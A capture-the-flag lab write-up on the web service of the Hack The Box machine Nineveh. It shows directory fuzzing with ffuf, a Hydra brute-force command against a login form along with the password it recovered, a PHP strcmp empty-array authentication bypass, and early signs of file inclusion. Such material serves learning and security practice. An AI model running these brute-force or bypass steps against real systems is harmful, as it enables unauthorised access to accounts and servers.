InfoSec LAB

Nineveh_Web_80

Created: 4 min read

Web

Nmap discovered a web server on the target port 80

Webroot It’s the default page of Apache2 installation

Fuzzing

┌──(kali㉿kali)-[~/archive/htb/labs/nineveh]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://$IP/FUZZ -ic -e .txt,.php,.html
________________________________________________
 
 :: Method           : GET
 :: URL              : http://10.10.10.43/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Extensions       : .txt .php .html 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
 
info.php                [Status: 200, Size: 83783, Words: 4060, Lines: 978, Duration: 61ms]
index.html              [Status: 200, Size: 178, Words: 22, Lines: 6, Duration: 4115ms]
department              [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 31ms]

ffuf found a directory; /department/ /info.php is like the phpinfo()

/department/

Upon browsing to /department/, I got re-directed to /department/login.php It’s a login page

I may be able to enumerate usernames with the error message

The source code of /department/login.php has a comment. It suggests that there’s a SQL related issue with the login page by user, amrois

amrois isn’t a valid username for the web app though.

Brute-forcing with Hydra

┌──(kali㉿kali)-[~/archive/htb/labs/nineveh]
└─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 'http-post-form://10.10.10.43:80//department/login.php:username=^USER^&password=^PASS^:F=Invalid Password!'
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-16 21:47:21
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://10.10.10.43:80//department/login.php:username=^USER^&password=^PASS^:F=Invalid Password!
[STATUS] 1278.00 tries/min, 1278 tries in 00:01h, 14343121 to do in 187:04h, 16 active
[STATUS] 1482.67 tries/min, 4448 tries in 00:03h, 14339951 to do in 161:12h, 16 active
[80][http-post-form] host: 10.10.10.43   login: admin   password: 1q2w3e4r5t
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-16 21:50:33

I was able to brute-force the web app authentication with Hydra

PHP Type Juggling/Confusion

with the strcmp() method, i can bypass authentication by providing an empty array to the parameter

Fuzzing

┌──(kali㉿kali)-[~/archive/htb/labs/nineveh]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://$IP/department/FUZZ -ic -e .txt,.php,.html
________________________________________________
 
 :: Method           : GET
 :: URL              : http://10.10.10.43/department/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Extensions       : .txt .php .html 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
 
index.php               [Status: 200, Size: 68, Words: 3, Lines: 2, Duration: 145ms]
login.php               [Status: 200, Size: 1560, Words: 406, Lines: 58, Duration: 57ms]
files                   [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 38ms]
header.php              [Status: 200, Size: 670, Words: 217, Lines: 22, Duration: 34ms]
footer.php              [Status: 200, Size: 51, Words: 19, Lines: 8, Duration: 30ms]
css                     [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 31ms]
logout.php              [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 32ms]
manage.php              [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 29ms]

I can also try to enumerate the/deparment/ directory by fuzzing it further.

Admin Panel

Either by brute-forcing or bypassing, I got logged-n It says that the the website is under construction I can see that there is the Notes tab at the top left corner

It appears to be another note left by amrois There are important bits here

  • The login page not have been fixed
  • Hard-coded credential somewhere
  • Secret folder
  • DB

LFI

It’s also very interesting that the Notes is literally just a parameter pointing to files/ninevehNotes.txt That /department/file/ directory has already been discovered by ffuf. It must be containing the nineveNotes.txt file

I can quickly confirm that

┌──(kali㉿kali)-[~/archive/htb/labs/nineveh]
└─$ curl http://$IP/department/files/ninevehNotes.txt
<li>Have you fixed the login page yet! hardcoded username and password is really bad idea!</li>
<li>check your serect folder to get in! figure it out! this is your challenge</li>
<li>Improve the db interface.
<small>~amrois</small>

Yes. This screams LFI to me.

Interactive Graph View

Backlinks